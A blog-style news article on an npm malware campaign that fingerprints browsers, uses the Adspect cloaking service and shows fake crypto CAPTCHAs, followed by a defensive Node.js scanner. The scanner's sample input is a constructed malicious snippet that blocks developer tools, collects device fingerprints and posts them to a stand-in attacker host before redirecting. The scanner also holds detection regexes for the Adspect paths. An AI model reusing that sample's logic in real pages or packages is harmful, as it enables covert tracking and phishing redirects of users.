New npm Malware Uses Clever Tricks to Target Crypto Users


According to Infosecurity Magazine, security researchers have uncovered a sophisticated npm malware campaign built on seven malicious packages operated by the threat actor dino_reborn. The Socket Threat Research Team found that six of the packages contained nearly identical 39 KB malware samples, while the seventh built fake web pages. All of the packages executed automatically through immediately invoked function expressions (IIFEs), collected thirteen device-fingerprinting data points and sent them to the Adspect API for analysis. The malware then showed victims fake crypto CAPTCHAs branded as standx.com, jup.ag or uniswap.org, while showing researchers a blank page. All seven packages remained live until recent takedown requests placed them into npm's security holding.


How the scam works

Here's the clever part: this isn't your average malware. The packages use Adspect, a commercial cloaking and traffic-filtering service, and turn it into the gatekeeper for the attack. When a page that includes one of these packages loads in a browser, the script immediately fingerprints the device, everything from the browser and platform to the language settings. That data is sent to Adspect's API, which makes a split-second decision: is this a real potential victim, or a security researcher?

If you look like a researcher? You get a blank white page. Nothing to see here. If you look like a regular user? A fake CAPTCHA that redirects you to whatever malicious URL Adspect decides to serve up. And since Adspect hands out fresh redirect URLs each time, the payloads can change constantly. Note that the decision is made server-side: the package on disk never contains the final landing page, only the fingerprinting code and the call home, so static analysis of the package alone will not tell you where victims end up. Pretty slick evasion technique, honestly.

Red flags for developers

So what should developers and security teams be watching for? The researchers highlighted some immediate red flags. Any script that disables user interactions, such as blocking right-click, F12 or Ctrl+U, should raise alarms: those are the shortcuts for the context menu, the developer tools and view-source, and a legitimate library has no reason to suppress them. The same goes for code that posts detailed client fingerprints to unfamiliar PHP endpoints. And network defenders should specifically monitor for the /adspect-proxy.php and /adspect-file.php paths across domains.

Look, this campaign is particularly concerning because it blends open source distribution with techniques we usually see in malvertising. The attacker even built in fallback code that reconstructs the branded pages locally if the network request fails, so the lure still renders when the call to Adspect does not come back. This isn't some amateur operation; it's sophisticated enough to worry about.

Broader implications

What's really interesting here is how this reflects the evolving threat landscape. Attackers are getting smarter about using legitimate infrastructure for malicious purposes. Adspect is a real service; it's just being abused. And targeting npm packages? That's hitting developers right in their workflow.

For enterprises, this means dependency scanning and software composition analysis just became even more critical. Can you afford to have malicious code slipping into your builds because someone installed what looked like a legitimate package? I don't think so. Keep in mind, though, that these packages stayed live until they were reported, so a scanner that only knows published advisories would have missed them for that whole window; behaviour-based checks on what a package does (auto-executing code, fingerprint collection, unexpected network calls) matter as much as the blocklist. The researchers warned that we should expect more of these Adspect-style cloaking attacks with new brand facades and package names. Basically, this isn't going away; it's the beginning of a new attack pattern.

Staying protected

So what can you do? First, treat any unexpected script that disables user interactions as an immediate red flag. Monitor your network for those Adspect proxy paths. And maybe most importantly, assume that open source packages can be compromised. Follow research from teams like Socket's to stay informed about emerging threats.
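To make the red flags from "Red flags for developers" and the advice above concrete, here is an added example: a small Node.js triage scanner that is not code from the article, from Socket, or from the malicious packages. It checks a package's JavaScript source for an auto-executing IIFE, right-click / F12 / Ctrl+U blocking, a batch of browser fingerprint property reads, a fetch()/XHR to a .php endpoint on a host you do not recognise, and the two Adspect paths, then filters web-proxy log lines for those same paths. The indicator regexes, the weights and thresholds, the ALLOWED_HOSTS list and every sample input are constructed assumptions for illustration, not indicators extracted from the real packages.

```javascript
// Added example (not the article's, Socket's or the attacker's code).
// Heuristic triage for the red flags the article lists. All regexes,
// weights, thresholds, hosts and sample inputs below are assumptions.

// Assumed: hosts your own code is expected to talk to. Anything else is "unfamiliar".
const ALLOWED_HOSTS = new Set(['api.example-corp.internal']);

// Each indicator is a name, a regex, and a weight toward the final score.
const INDICATORS = [
  { name: 'iife-autoexec',
    re: /\(\s*(?:async\s+)?function\b[\s\S]*?\}\s*\)\s*\(\s*\)/, weight: 1 },
  { name: 'blocks-contextmenu',
    re: /(?:addEventListener\(\s*['"]contextmenu['"]|oncontextmenu\s*=)/, weight: 2 },
  { name: 'blocks-f12',
    re: /(?:\bkeyCode\s*===?\s*123\b|\bkey\s*===?\s*['"]F12['"])/, weight: 2 },
  { name: 'blocks-ctrl-u',
    re: /ctrlKey[\s\S]{0,80}?(?:['"]u['"]|keyCode\s*===?\s*85\b)/i, weight: 2 },
  { name: 'adspect-path',
    re: /adspect-(?:proxy|file)\.php/, weight: 5 },
];

// Properties commonly read when fingerprinting a browser. Five or more distinct
// reads in one file count as a fingerprinting attempt (assumed threshold).
const FINGERPRINT_PROPS = [
  'navigator.userAgent', 'navigator.language', 'navigator.languages',
  'navigator.platform', 'navigator.hardwareConcurrency', 'navigator.deviceMemory',
  'navigator.plugins', 'navigator.doNotTrack', 'navigator.cookieEnabled',
  'screen.width', 'screen.height', 'screen.colorDepth', 'resolvedOptions().timeZone',
];

// Collect fetch()/XHR targets that end in .php on a host not in ALLOWED_HOSTS.
function unfamiliarPhpEndpoints(src) {
  const urlRe = /(?:fetch\(|\.open\(\s*['"](?:POST|GET)['"]\s*,)\s*['"`](https?:\/\/[^'"`\s]+\.php[^'"`\s]*)['"`]/g;
  const found = [];
  for (const m of src.matchAll(urlRe)) {
    if (!ALLOWED_HOSTS.has(new URL(m[1]).hostname)) found.push(m[1]);
  }
  return found;
}

// Score one package source file and return the indicators that fired.
function scanPackageSource(src) {
  const hits = [];
  let score = 0;
  for (const ind of INDICATORS) {
    if (ind.re.test(src)) { hits.push(ind.name); score += ind.weight; }
  }
  const fpCount = FINGERPRINT_PROPS.filter((p) => src.includes(p)).length;
  if (fpCount >= 5) { hits.push(`fingerprinting(${fpCount} props)`); score += 3; }
  const endpoints = unfamiliarPhpEndpoints(src);
  if (endpoints.length) { hits.push(`posts-to-php:${endpoints.join(',')}`); score += 3; }
  // Verdict thresholds are assumptions; tune them against your own package corpus.
  const verdict = score >= 8 ? 'block' : score >= 4 ? 'review' : 'clean';
  return { score, hits, verdict };
}

// Match the two Adspect paths the article names in web-proxy access logs.
const ADSPECT_PATH_RE = /\/adspect-(?:proxy|file)\.php\b/;
function flagProxyLogLines(lines) {
  return lines.filter((l) => ADSPECT_PATH_RE.test(l));
}

// Constructed sample inputs (not real package code, not real log lines).
const SAMPLE_SUSPICIOUS = `
(function () {
  document.addEventListener('contextmenu', (e) => e.preventDefault());
  document.addEventListener('keydown', (e) => {
    if (e.keyCode === 123 || (e.ctrlKey && e.key === 'u')) e.preventDefault();
  });
  const fp = {
    ua: navigator.userAgent, lang: navigator.language, plat: navigator.platform,
    cores: navigator.hardwareConcurrency, mem: navigator.deviceMemory,
    w: screen.width, h: screen.height, depth: screen.colorDepth,
    tz: Intl.DateTimeFormat().resolvedOptions().timeZone,
  };
  fetch('https://cdn.example-attacker.invalid/adspect-proxy.php', {
    method: 'POST', body: JSON.stringify(fp),
  }).then((r) => r.text()).then((url) => { if (url) location.href = url; });
})();
`;
const SAMPLE_BENIGN = `
export function add(a, b) { return a + b; }
fetch('https://api.example-corp.internal/report.php', { method: 'POST' });
`;
const SAMPLE_LOG = [
  '10.0.0.5 - - [01/Jan/2025:10:00:00 +0000] "GET /index.html HTTP/1.1" 200',
  '10.0.0.7 - - [01/Jan/2025:10:00:01 +0000] "POST /adspect-proxy.php HTTP/1.1" 200',
  '10.0.0.7 - - [01/Jan/2025:10:00:02 +0000] "GET /adspect-file.php?id=1 HTTP/1.1" 200',
];

console.log(scanPackageSource(SAMPLE_SUSPICIOUS)); // score 18, verdict 'block'
console.log(scanPackageSource(SAMPLE_BENIGN));     // score 0, verdict 'clean'
console.log(flagProxyLogLines(SAMPLE_LOG));        // the two adspect-*.php lines
```

Run it with `node scan.js` against the constructed samples, or feed it the contents of a package's files before you commit a new dependency. It is a triage heuristic, not a blocklist: it only sees what is literally in the file, so an obfuscated or dynamically loaded fingerprinter will not trip the regexes, and a "review" verdict means a human should open the file, not that the package is safe.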

The scary truth is that as development workflows become more automated, attackers are finding clever ways to inject themselves into the supply chain. This npm campaign shows they're getting better at it. Stay vigilant out there.
